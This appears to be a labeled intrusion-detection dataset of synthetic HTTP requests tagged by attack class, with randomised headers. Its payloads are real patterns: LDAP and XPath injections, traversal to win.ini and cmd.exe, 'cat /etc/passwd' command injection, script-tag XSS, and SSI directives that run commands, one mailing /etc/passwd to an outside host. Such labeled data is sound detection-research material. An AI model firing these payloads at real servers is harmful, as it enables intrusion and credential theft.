If-Unmodified-Since: Fri, 25 Apr 08 02:56:58 GMT
If-Match: *
If-None-Match: "c3LQwWVPuEMKRCWH0gf"
If-Range: Fri, 16 Sep 05 07:40:19 CET
Max-Forwards: 2596
MIME-Version: 1.8
Pragma: tiyrnu='ee8cq'
Proxy-Authorization: NTLM UGFBdGk4c3ZhNWk0b290ZXRodGVvb2N0UzFtT2lveXJvc2Ru
Authorization: Enne e6ota=ceehpe
Range: 2-5,-391
Referer: /tauO/agi1/teosi.php4
TE: trailers,deflate;q=0.4
Trailer: Host
User-Agent: Mozilla/4.8 (X11; U; Solaris 4.1; tg-7o; rv:5.1.2) Gecko/82027855
UA-CPU: PowerPC
UA-Disp: 742,2997,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8704x3840
Via: 7.0 21.39.153.126, 6.2 165.165.27.229:3
Transfer-Encoding: deflate
Upgrade: dQe/5.1, Tkrp/2.6, 93t/2.8
Warning: 348 176.99.74.150 "C9nbizlettg" 
X-Forwarded-For: 69.41.201.3
X-Serial-Number: 97437776345
----: ---------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45818
Start - Id: 37217
class: LdapInjection
GET /m1etrewO2e0tltiw/aTWd1c/sPa688alLvrtt/EYT/d1tida/VpgEK1PiiP/yo%uHEshutdownWchild4GI/iH./eeasiairrcre1prke/mbloM7syoo-g4J7ZFgxc/fekaer7wrrayyrroeR3D.tiff?alpo=sdiordoR6e&6nYTg=%40oz&a7stgaltxo=%29++++%28+++%7C++++%28++cn%3D*o++%27brien*++%29%28mail%3D*o++++%27brien*%29++++&9alarheH=ce HTTP/1.1
Host: www.34oN.org
Connection: Euirsi
Accept: */*
Accept-Charset: big5
Accept-Encoding: 
Accept-Language: dqt3yr-Elw, e8eahnhq-ou49sapa, nuzsspt2-asoqict, iejoil-ikcnsAeH, ovSaa-qe;q=0.7
Cache-Control: no-cache
Client-ip: 236.64.159.239
Cookie: ns3etctz3oe0=76
Cookie2: $Version="284"
Date: Sun, 19 Dec 04 19:44:43 GMT
ETag: "_vIBBGYngq9SPEzZWqX"
Expect: eesgne
From: elnti@yrkgthY.de
If-Modified-Since: Sat, 23 May 09 24:42:34 UTC
If-Unmodified-Since: Sun, 25 Apr 10 23:03:03 GMT
If-Match: "WUclZDkjrH9trt3mOL"
If-None-Match: *
If-Range: Tue, 25 Nov 08 04:24:37 UTC
Max-Forwards: 82
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: tDe6E m4epcS4h=efrrIta
Range: -906
Referer: http://www.toic7.ch/jfssdA.cfm
TE: gzip,deflate;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/8.2 (Machintosh; U; PPC Mac OS X 0.4; ct-ol; rv:2.9.8) Gecko/88079745
UA-CPU: Sparc
UA-Disp: 4047,0109,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0874x8291
Via: HTTP/2.1 87.198.198.106, emut/6.8 147.231.221.54:7365
Transfer-Encoding: esvsd
Upgrade: cleeI/2.9, MCtE/0.6, Tse/6.1, rge/4.6, esEkld/2.9
Warning: 553 www.Nftmdh.html "rnvarnu59oDgV" "Mon, 31 Oct 05 08:57:55 UTC"
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 973297601016037015
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37217
Start - Id: 45093
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.0
Host: www.a2na9ne.be:43
Connection: close
Accept: application/*;q=0.5, video/mpeg, image/*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.3
Cache-Control: min-fresh=2
Client-ip: 217.208.54.150
Cookie: 6fofT3ben=gqQo1;ea1smudacAs=rmOwTnha3dt 
Cookie2: $Version="39"
Date: Wed, 09 Nov 05 24:54:32 CET
ETag: W/"B3.Iv9-wbWtp5WC3E7pb"
Expect: 100-continue
From: hlsgr2q@lokeQ.ch
If-Modified-Since: Wed, 30 Nov 05 11:41:10 CET
If-Unmodified-Since: Wed, 12 Nov 08 05:44:50 GMT
If-Match: "cQXjZG9mFvRWGh1atz"
If-None-Match: "gAja489I21QsH_zgF6bm"
If-Range: Sun, 11 Mar 07 04:04:23 CET
Max-Forwards: 950
MIME-Version: 6.7
Pragma: ahla='llt'
Proxy-Authorization: Digest cnonce="lEha"
Authorization: Digest cnonce="srjattr"
Range: 61-,599945-,96-
Referer: http://retrpeii.net/eAeOreo.sh
TE: trailers,gzip,trailers
Trailer: Connection
User-Agent: lFRLD@3p http://www.5fu1er.cz
UA-CPU: StrongARM
UA-Disp: 0628,6146,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 213x015
Via: 2.1 www.nmIjfen.jpg, 6.3 54.170.128.53
Transfer-Encoding: gzip
Upgrade: ud4hrt/2.8, ifephn/3.0, adtIIr/9.5, oHsuT3/8.9
Warning: 131 165.136.34.196 "tchbajdsaa" "Fri, 12 Mar 10 18:52:44 CET"
X-Forwarded-For: 211.43.232.104
X-Serial-Number: 072717739908408335
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45093
Start - Id: 44547
class: OsCommanding
GET /handler;cat /etc/passwd| ? HTTP/1.0
Host: 35.238.197.30
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: s5sbhi-tel;q=0.5, nmf-onbS5pr4;q=0.9, o1ntsdR-tarn6t;q=0.1
Cache-Control: only-if-cached
Client-ip: 15.83.253.70
Cookie: @1orsock_streamDobody=aresaIouruhx;ta=39551724;S8S3Ow0=6230764;eenitrkaoa=te;8vautoexecoSp=te@lvbscriptperl$ale
Cookie2: $Version="7"
Date: Mon, 27 Jun 05 22:18:51 CET
ETag: "jkPmPul2szt6mLKeLP"
Expect: lr0eemtl
From: tzi1ete@elNpu.cz
If-Modified-Since: Mon, 28 Dec 09 23:50:38 UTC
If-Unmodified-Since: Sat, 01 Oct 05 24:33:49 GMT
If-Match: *
If-None-Match: "Rac20ZHVWp9u2Qyv41F"
If-Range: Thu, 01 Feb 07 18:09:19 GMT
Max-Forwards: 2
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic YXJucGF4bnM6Rm90aGl6
Authorization: NTLM bmhicWF3b3BlaXRvZW9lcjRhU3JvSTdmNXBvRGFvYWN1MW5nZ2d1aTh0dA==
Range: -06354,383-6635,26244-
Referer: http://www.t7raosc.ch/elee4.doc
TE: deflate;q=0.2
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.6 (Machintosh; U; Mac OS X 0.6; hS-nd; rv:4.3.9) Gecko/35784004
UA-Pixels: 8286x4573
Via: 6.0 www.rmHi6x.shtml:820, 2.0 52.249.176.251
Transfer-Encoding: deflate
Warning: 178 www.psrrz.gif:1 "5eiuelyVouirXa" 
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44547
Start - Id: 36500
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 193.142.255.113
Connection: close
Accept: video/mpeg
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 71.53.140.2
Cookie: o4sthoErtnsv3i=ioIYyoduutcey;acm=95;b9n9t6gah=p@4T6;ues3shfecttre7=064214
Cookie2: $Version="050"
Date: Sun, 17 Sep 06 23:07:55 CET
ETag: "PbL-0SjZXzb3X6N9tt"
Expect: atcEeo
From: gshio@xxma.be
If-Modified-Since: Thu, 07 May 09 22:48:44 UTC
If-Unmodified-Since: Thu, 21 Jan 10 17:11:10 UTC
If-Match: "lMqOAnisi3zsqiE"
If-None-Match: *
If-Range: "_z.zCFUN3Jq.GaGGwX6"
Max-Forwards: 075
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: 0eHre bae13=roeTol
Authorization: NTLM ZG9zN25kdWtzdHJkaGlzZWR3aDZFN2FicHlobkJvbWFkQWVhZWRQdWxvbzNvUw==
Range: 998505-,-0540,815-
Referer: /vxtayw/rAtmi/ozau.bin
TE: trailers,trailers,chunked;q=0.5
Trailer: If-Modified-Since
User-Agent: Mozilla/5.7 (compatible; MSIE 9.6; Mac OS X; Daaba; lrwi1h)
UA-CPU: MIPS
UA-Disp: 5117,829,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 512x1298
Via: esr/2.8 113.183.178.105
Transfer-Encoding: gzip
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36500
Start - Id: 36921
class: LdapInjection
PUT /eeuwe/leyhodieahdc6eyain/2ej2n8vihsolom/nsCg5N4no1CrsSfamyAE/spleTtteodaromvla.gif? HTTP/1.0
Content-Length: 55
Content-Language: r8c5mls,aaz,cvtEerYp
Content-Encoding: identity
Content-Location: /rdrr/xbOttg/Aere5ewd/arsi.jpg
Content-MD5: dXJ1ZXNldnRlYjl4ZWVlcw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Dec 09 03:05:51 UTC
Last-Modified: Fri, 04 Dec 09 11:32:05 UTC
Host: 39.179.55.247:09270
Connection: close
Accept: video/*;q=0.7, video/mpeg, image/png
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.4
Cache-Control: a='Dii'
Client-ip: 23.24.154.22
Cookie: demOoomh=h@bEREJD;eeh2c=93;QrBnys=crrphap~&is;ha0duria67i=O4aeformAr;toErAefla=[r2uiuit
Cookie2: $Version="09"
Date: Sun, 03 Aug 08 13:40:49 GMT
ETag: "7CzrtZQjtt25ZCoqQ@cR"
Expect: 100-continue
From: dhafadn@folsiatle.com
If-Modified-Since: Fri, 01 Dec 06 22:26:15 CET
If-Unmodified-Since: Fri, 17 Nov 06 08:17:43 GMT
If-Match: *
If-None-Match: "DU4x.HM2gYYPDUH2eZbK"
If-Range: Fri, 14 Mar 08 10:30:46 GMT
Max-Forwards: 1
MIME-Version: 5.9
Pragma: OecrGjt=kae9ne
Proxy-Authorization: NTLM cmVlZXRyZWdpYWJlb3N0ZUFPdGd6bm85Ym5jbndpdG5jc2Vxc2J1YVNlcg==
Authorization: Digest algorithm=MD5-sess
Range: 03-
Referer: http://www.ttkOyTm.st/scahbt/rasevy/akmen/l1ft/e3ytr.js
TE: chunked,chunked;q=0.4,trailers
Trailer: Accept
User-Agent: Mozilla/6.8 (Machintosh; U; Mac OS X 4.0; 14-lt; rv:5.3.1) Gecko/24669206
UA-CPU: Sparc
UA-Disp: 0609,6015,16
UA-OS: Win98
UA-Pixels: 015x0585
Via: 3.0 128.168.94.165, FTP/6.3 138.250.39.41
Transfer-Encoding: gzip
Upgrade: ejsf/1.7, lxAe/6.8, 3Tuete/5.0
Warning: 029 17.241.6.13:76 "8tya4sneebfR" "Fri, 14 Mar 08 05:58:01 GMT"
X-Forwarded-For: 189.182.231.41
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

srq9ge7tisw=mdsud)(&(objectClass   = EtEr*)

End - Id: 36921
Start - Id: 46495
class: XSS
GET /<SCRIPT>/? HTTP/1.1
Host: 216.100.51.58:80
Connection: lnlTth
Accept: text/plain, application/x-tar;q=0.5, text/*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-age=03280
Client-ip: 219.134.80.54
Cookie: at4a=93;0-esystem-vkincludeC=239;h3uneiOrir=H-%
Cookie2: $Version="5"
Date: Sun, 04 Apr 04 11:30:35 CET
ETag: "pjlnXx9p-jlmpT@5"
Expect: 5rctCi08
From: musoa@e4qteeenfg.net
If-Modified-Since: Mon, 09 Oct 06 08:36:52 CET
If-Unmodified-Since: Sat, 23 Feb 08 14:10:27 UTC
If-Match: "3mUtbnnwRNvnNHdHBy"
If-None-Match: "W5fHifN204xHZvD_Cooi"
If-Range: "-j9OI@AIkxXhBo86PRq"
Max-Forwards: 24
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: rarue cuhae=0regdom
Range: 0-48
Referer: /t8tdry9/hpnedeb.jpeg
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/0.6 (compatible; 9onhusehs; SunOS sun4u; TsoeCashs; ovbe; e2ondgitp)
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 139x000
Via: HTTP/7.8 www.etND3ce.js
Transfer-Encoding: otsn; troe=con6a
Upgrade: us6nre/1.5
Warning: 000 30.27.133.227 "nEecyFef" 
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 46495
Start - Id: 47802
class: XSS
GET /nQZ/ldcvnhgj9emslvD.tiff?etuf6ooa0gei=619&6gDepn7=063&kFQ3Bmoncmailswk=%3Cscript++++%3Ealert++++%28aibdO5nEfaah.telos6%29%3C%2Fscript++++%3E&neteofiePe=e9aes0l&aeoryloN8trOir=4hen7f1wo1&CLKdiJ2=voo74%26+E%26a%3EtosmtgA&arHaIexecxTw=31&ob=34&nnnlAr1u=402 HTTP/1.1
Host: 38.226.6.209
Connection: keep-alive
Accept: audio/*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: eX-dt1te, Enl-jPx, tfl-ihnslnX, ttyr-MeKeHre;q=0.6, ttj3texa-tcwntehh;q=0.2
Cache-Control: no-transform
Client-ip: 52.228.63.189
Cookie: 9kzl=oii;ie3ensee17se=2;aijbao=c@rkHobrs yesn 
Cookie2: $Version="582"
Date: Mon, 03 May 04 24:00:12 UTC
ETag: W/"jgC-8NRikg5ooYRuYC"
Expect: 100-continue
From: abl8eEs@dtibtid.ch
If-Modified-Since: Tue, 08 Nov 05 06:08:54 CET
If-Unmodified-Since: Wed, 27 Dec 06 02:15:21 GMT
If-Match: *
If-None-Match: "CMTQ5WbNNMWEJAWl"
If-Range: Thu, 30 Jun 05 01:55:48 UTC
Max-Forwards: 295
MIME-Version: 8.3
Pragma: tgujne=veo
Proxy-Authorization: Digest username="oaid"
Authorization: Digest username="eoith"
Range: 944229-6,250-
Referer: http://www.ronauc.ch/82l4uz/enenuS/e2el9q/wtlEh.tiff
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: lmyuhaf (nrdqO5Sb; hLKln-ZcJ; t-ubdde-B; iIgvE5)
UA-CPU: x86
UA-Disp: 184,045,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5941x524
Via: 8.3 77.93.85.118, FTP/9.2 63.90.219.150
Transfer-Encoding: compress
Upgrade: thgmp/3.3, cwanec/6.4
Warning: 828 187.164.150.25 "gathtunnr5k6dxt7" "Sat, 23 Apr 05 07:02:53 UTC"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 14491
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47802
Start - Id: 49511
class: XPathInjection
GET /acortAlvort/cZ.DAAXX@Bz/_T88Nlinkhk50HHZ.html?5lreooD8tsvpeS=nit%27+++or+1%3C+++b6e7%2Fe%2FixtO%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D324%5D+or+++++%27andumCg1%27%3D++++%27 HTTP/1.1
Host: www.mtfsl.it
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, deflate
Accept-Language: oan-are;q=0.7, 9aogs-s3dbeuhi
Cache-Control: no-store
Client-ip: 202.44.218.0
Cookie: iettce5yihow=8;ClinkRadmin=28o;teneye6hhkst=qMMaB;OdNpur_e=680405795;ricbtwser=en;snjlatt=s8e@[ai
Cookie2: $Version="988"
Date: Wed, 08 Aug 07 17:54:12 CET
ETag: W/"LgrbNKdjGgCPMpMckC"
Expect: igeeah=za6rsomx;otXlia7e
From: eaatpaso@ksiwaan.org
If-Modified-Since: Tue, 20 Dec 05 08:58:22 GMT
If-Unmodified-Since: Sun, 22 Mar 09 12:46:13 CET
If-Match: "yrIQ92TyCN41oG5-D4hS"
If-None-Match: "jXfoYw5SlSwVNd7CGXV"
If-Range: *
Max-Forwards: 353
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: ao6tbr qsmelsdm=S7mcd8of
Authorization: Paadee rEj1hp=eheis8
Range: -88469
Referer: /th4ijiny.jsp
TE: trailers,trailers,deflate
Trailer: Date
User-Agent: Mozilla/9.2 (X11; U; Solaris 8.1; e5-g7; rv:9.4.4) Gecko/90091585
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4726x3292
Via: i3l/7.4 92.76.229.198, Inx5f/1.2 www.te9N.jpg
Transfer-Encoding: identity
Upgrade: itnn/7.0, e8wien/4.6, 6sde2/3.7, niNg/1.6
Warning: 646 www.qqkiis.css "nsutrl9tXaNtumo" 
X-Forwarded-For: 113.38.28.52
X-Serial-Number: 201583507
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49511
Start - Id: 40052
class: SSI
GET /rr5doAf_iBK82/EEoTF/hslruencsqrsoM45e/hhGi3VXECb1dRw/xledrkoi/PP/i86nic@XP/ntsnernoinrpidpl/ffJ8/ueV8j-9WfG4juZ/h31pentio.jpg?n2ciaeo6s=kdsO5t+&7y7=fEtgta2e&depis70nrCxied=080659&CMSitbetweensA7t=cd%5Dl&bmjIphlREmwa=%3C%21--++++%23exec++++cmd%3D%22%2Fbin%2Fls++++-l+%2Fhome%2FzpetE%2Fgeton%22+++++--%3E&fzfesntls=mmoutnzoteelcttta&rsl0eeolfeevtqm=vqe1netrrbesmt&y1zautoexecA2Xperlusr2=n1Hxj_77ay&saabstb15ihDbtc=e%24script&trDs8l=ENAheoghyi&fphxrode=9TDpD32&N7P0=0tshisegity5K HTTP/1.0
Host: 163.125.190.33
Connection: aytr
Accept: video/quicktime;q=0.4, audio/basic, application/rtf;q=0.6
Accept-Charset: x-mac-hebrew;q=0.2, iso-8859-2, isiri-3342, x-mac-cyrillic
Accept-Encoding: 
Accept-Language: e-atl6e;q=0.4, eeOp-td;q=0.2, h-qnf
Cache-Control: t='Rdatebrd'
Client-ip: 9.121.250.171
Cookie: Ekf5oenm=ijnrPaoi6;tetgrwnr22=xlE=yohttpseeglteng>otaccept;hhsedepdnarFe=)b autoexece;o7=1053;t0vd=08209722
Cookie2: $Version="977"
Date: Tue, 27 Oct 09 17:15:19 CET
ETag: W/"7-i2qZpzS5IN79lIH"
Expect: 100-continue
From: eto0Hh@8untinHaB.de
If-Modified-Since: Sat, 06 Mar 10 15:33:13 UTC
If-Unmodified-Since: Sun, 03 Jun 07 21:41:11 GMT
If-Match: "BZGI_H@5lmn62uykm1E7"
If-None-Match: *
If-Range: "Hkmy4h@P4_ZvxaB"
Max-Forwards: 196
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic bWVlb206aXVvdA==
Authorization: NTLM ZGhzaHRkZDJwd3NhaWV0cGRvNm9nT2loblVaZUVvc2FvdmZ1dG9IZQ==
Range: 271-,17364-
Referer: http://www.eemtreo.org/LchdCg3g/ikAisot/oo8itb/d2nG/p4ak.asmx
TE: gzip;q=0.4,deflate;q=0.1
Trailer: User-Agent
User-Agent: Mozilla/5.1 (Windows; U; Win98 9.3; va-wo; rv:3.2.3) Gecko/58948371
UA-CPU: PowerPC
UA-Disp: 098,0653,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 4665x776
Via: 0.9 193.126.112.77
Transfer-Encoding: deflate
Upgrade: cGu/7.6
Warning: 121 www.dA5sr8o.jpeg "styttnrgtUmmsooculs" "Sun, 07 Dec 08 03:09:39 CET"
X-Forwarded-For: 91.94.98.157
X-Serial-Number: 02001
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40052
Start - Id: 45886
class: PathTransversal
GET /g@/tioth/iPxUAE/ePcWK4m.yAT85JxM/sraet1ltEejhn/E4lbodyeval1LsAcFZ6R./am-aa/cOsnoaryfnaoleeumd.cgi?essnTerbenfa2t1=951&OGrqp2n76@XR=net&8tsuNkw0o6hes=774&WZVoXmRl=buvltoraizFozdrkfs&IBpMpcscriptK7wform=rigntemail%3Arg%40ado%2FsS&gTIansdl=be&ok6object0JXPcSE1=..........................WINNTsystem.ini HTTP/1.0
Host: www.oeecp.it
Connection: close
Accept: text/html, application/rtf;q=0.4, image/*;q=0.6
Accept-Charset: iso-2022-kr, shift_jis, cp-936;q=0.5
Accept-Encoding: 
Accept-Language: geS-ewtgozen
Cache-Control: lfsi=1plUaSsf
Client-ip: 28.134.204.98
Cookie: xzniHaniee=92;biucl=ok4C7I;oYoNc=open$6R;ntgsAUe3=ehO;gOK7ncr4C.Z9G=dx
Cookie2: $Version="738"
Date: Sun, 16 Dec 07 16:59:27 GMT
ETag: W/"@9PfQx8cIAjptFMfc"
Expect: 100-continue
From: erymey@jq6fn.org
If-Modified-Since: Sat, 27 Mar 04 01:55:03 CET
If-Unmodified-Since: Thu, 01 Nov 07 13:43:47 CET
If-Match: *
If-None-Match: "BTyz_6tsDEPm5Zt"
If-Range: Sun, 04 Jun 06 01:21:45 GMT
Max-Forwards: 434
MIME-Version: 5.1
Pragma: q=naa
Proxy-Authorization: NTLM bXJzYXBhbGFnZ25vNnQ2YXJhc050bnNoZUttZktzcm0=
Authorization: RsBe h3em=leSos5t
Range: 81947-,357703-
Referer: /fEeYthu.pdf
TE: trailers
Trailer: TE
User-Agent: Mozilla/1.8 (Windows; U; WinNT 7.9; qt-tv; rv:6.4.8) Gecko/24282502
UA-CPU: StrongARM
UA-Disp: 567,3273,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0549x672
Via: ooieti/9.3 88.252.154.57
Transfer-Encoding: pqirj
Upgrade: srd/2.1, trlx/7.5, fh7e/2.0, xDtero/2.4
Warning: 813 www.vtuj27.png "rsxiUrrhinfa" "Sun, 10 Aug 08 15:25:17 UTC"
X-Forwarded-For: 39.173.242.210
X-Serial-Number: 42462997439342204016
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45886
Start - Id: 37937
class: LdapInjection
GET /er/tONhQA_P3mpCW/fGkItUqmBdea07Lf3Esj/k1rdfs/td/qlms1su/tfEUGx9K6VPA@dXuNy/nO/i2slncehdk42l/tt58gU9sL0cQj/pnEr2bixSthrRTxh/services6y4VH9Aut20VT.cfm?X4CV8SP=caiuCreh8wdrnWw5au&Msheeejboceoenh=r1ets%29%28++%7C++%28sr4%3D*%29&ldtRq9g11o=nsomp&uaeyg2sxrS=yaoO+%3AgAgsjNekbrlibe&RsA=d HTTP/1.0
Host: 181.39.140.135
Connection: close
Accept: application/zip, text/plain
Accept-Charset: windows-1255;q=0.8
Accept-Encoding: compress;q=0.2, gzip
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 93.212.172.244
Cookie: eeerjyaa=08252
Cookie2: $Version="8"
Date: Wed, 14 Jun 06 20:22:32 CET
ETag: W/"JIaiNtCmlEs.7pkMV8yn"
Expect: lue5olis
From: heal@ehrTn.gov
If-Modified-Since: Tue, 20 Apr 04 05:01:40 UTC
If-Unmodified-Since: Thu, 07 Feb 08 13:18:42 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 19 Sep 06 13:15:13 CET
Max-Forwards: 1
MIME-Version: 8.6
Pragma: 8r=l
Proxy-Authorization: Basic aGVuQXQ0aG86c2xweGg0bmU=
Authorization: Basic TGFxZ2k6eWRoMA==
Range: 92-
Referer: /eqaeo/Ehro7o/urnee.txt
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/3.5 (compatible; ciisjs; WinNT; sezdyCt; tpni)
UA-CPU: MIPS
UA-Disp: 472,2226,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 334x8610
Via: HTTP/0.1 www.lspeuP.html, HTTP/3.6 www.napI2nwr.js, HTTP/8.3 www.n6i5ns.jpg
Transfer-Encoding: identity
Upgrade: vtsi/8.4, niogL/5.5, sra/2.0
Warning: 299 www.dnpee.html "si779reU" "Mon, 02 Feb 04 01:33:32 UTC"
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 03021
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37937
Start - Id: 43079
class: OsCommanding
POST /d@Qarfy@x-tJ/5y_f4-r0ls.c/tteb0aredjdesaRa.exe? HTTP/1.0
Content-Length: 271
Content-Language: 8w
Content-Encoding: compress
Content-Location: /c7ad/iUohid/pusybiew.fgf
Content-MD5: Znh0NGxidHNheXVpZnNuaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 May 05 24:17:51 CET
Host: www.eo0rSNV.it
Connection: iimtaaar
Accept: audio/basic;q=0.8
Accept-Charset: x-mac-korean, x-mac-icelandic
Accept-Encoding: gzip, identity, compress, identity;q=0.3
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 56.53.104.65
Cookie: Vopeninput-lkK29=6138549;F0u3ifnqe=qewinntDe(a;osaosNttb9l=eiftutrfhno;awto3unals=hexcgttbodyiO
Cookie2: $Version="0"
Date: Wed, 09 May 07 02:42:40 CET
ETag: W/"eMtiP-Ze0_ie0Pb27"
Expect: 100-continue
From: twrTzya@l1npan.ch
If-Modified-Since: Sat, 05 Nov 05 05:24:27 CET
If-Unmodified-Since: Sat, 10 Dec 05 04:36:58 UTC
If-None-Match: "z-v_VeDmzp2WdrNt"
If-Range: "Yh5q_BimDYc8qBbxo"
Max-Forwards: 8422
Pragma: no-cache
Authorization: Basic YXNyaDp0cnB0Ng==
Range: 6369-838,-3833
Referer: /iceeoent/bsvzlyiZ/ornxTea.php
Trailer: Pragma
User-Agent: Mozilla/9.7 (Windows; U; Win98 9.1; ta-it; rv:4.6.4) Gecko/97321654
UA-OS: Win98
Via: 7.1 168.214.180.167, aot/9.1 205.104.158.48
Transfer-Encoding: L1no
~~~~~: ~~~~~~~~~~~~~~~

cIelg=tNWR&E1zFlinkv=ox7&5lwdn1i=Zlci &hNgOoas5lea=896446&UkRVAw-bQGAA=ismedhunewinntd:&siDhurmdeat7i=sel962&uihaIiarr=no;&auygBtotxtel=\"    \;\/usr\/bin\/telnet www.ilndtrmeleri.com    05   ;&kgmsSstetejvaxe=8528465&5neUtl9zt=osweo&qQ-Rdb=eZnn

End - Id: 43079
Start - Id: 40439
class: SSI
PUT /X8Hl-7rNI6AC/u9mYwpciH/nrhPikbr/end5@0K1EKL/o2TZH0UGhrfkuP/slifcibnnuee/_pg1NR1NchildRP/d2Swp-dAoNfD/blh3tt/3d.php3? HTTP/1.0
Content-Length: 366
Content-Language: dnIm5vv
Content-Encoding: identity
Content-Location: http://www.uSsxoe3i.de/t4teeE/eEzhwr6T/bI7ehl3S/ue1me/let2bih.bin
Content-MD5: YUlhc25vdHZ0amd0dGJ0RQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Thu, 01 Jul 04 04:37:09 GMT
Host: 10.64.232.76
Connection: ntcns
Accept: */*
Accept-Charset: koi8, x-mac-korean
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 101.154.247.123
Cookie2: $Version="9"
Date: Thu, 15 Mar 07 05:33:53 GMT
ETag: W/"pR4VYI4RuU_KP4ogskgy"
Expect: foxSoe
From: e3lr@eoyoSaeit.st
If-Unmodified-Since: Mon, 10 Mar 08 13:15:32 GMT
If-None-Match: ".bfDH7iDmesoOQI464"
If-Range: Fri, 29 May 09 17:51:07 CET
Max-Forwards: 542
Referer: /lyixheto/Inadrn/emrrA.conf
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: ludlu/7.5.6.4.2
UA-OS: Windows 98
Transfer-Encoding: ywfbOE; nxtu=tbeh
Warning: 680 www.njen.png "MjOsO" "Tue, 22 Jul 08 24:29:22 CET"

cloBhyp7x3ptl=<!--    #include    virtual="d:\windows\autoexec.bat"    -->&oiert73eidjlA=57727&xtiZ=1140825&h2eon9s0=4&Ot= eut0fxnMncSr&p4ufs=t3kW&embw3eyit6dh=9235&V9gdNm=iacsh@y1/h&ioovuS5aeagq=5444736&9ersRluetovonk=54369337&33cnheKwTolb=sf varbgsound/eEwr+h&ernossih=t&Ptlaeaii=j4qE2thuehnueira&ejguexpar0s=634&tlcs1tSreryy1n=%uvarp

End - Id: 40439
Start - Id: 40224
class: SSI
PUT /O8eEmei/processing-instruction8YJFL9Asock_streamoptjgA-/hifdlsEasli/or1qtDbgeshszu/g1nrrsgoq13jWjg/sn1/bms7shneter/replacewK/FX/cw_ajx.html? HTTP/1.0
Content-Length: 33
Content-Encoding: compress
Content-Location: /ystte/h6Iimhl/deso/keet/eactla.tiff
Content-MD5: c2h0eFlFaTJkcGdpZHRmdA==
Content-Type: application/x-www-form-urlencoded
Host: 164.106.107.119
Connection: keep-alive
Accept: text/*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: identity;q=0.0, gzip;q=0.6, compress;q=0.4, identity
Accept-Language: *;q=0.6
Cookie: nu2e=rPOfx;2_RO42D=c@no;jrophs2=exec8o;1ooer=augroup bylr;ot=<!--#exec   cmd="/bin/mail     rblgHrryha.com <   /etc/passwd"-->;Rl3gec7s=linkfxiE
Date: Fri, 22 Aug 08 19:38:44 CET
If-Match: "J6E-sJL-iOST1nQkpZ_"
Referer: /eHle/eboIgnu.exe
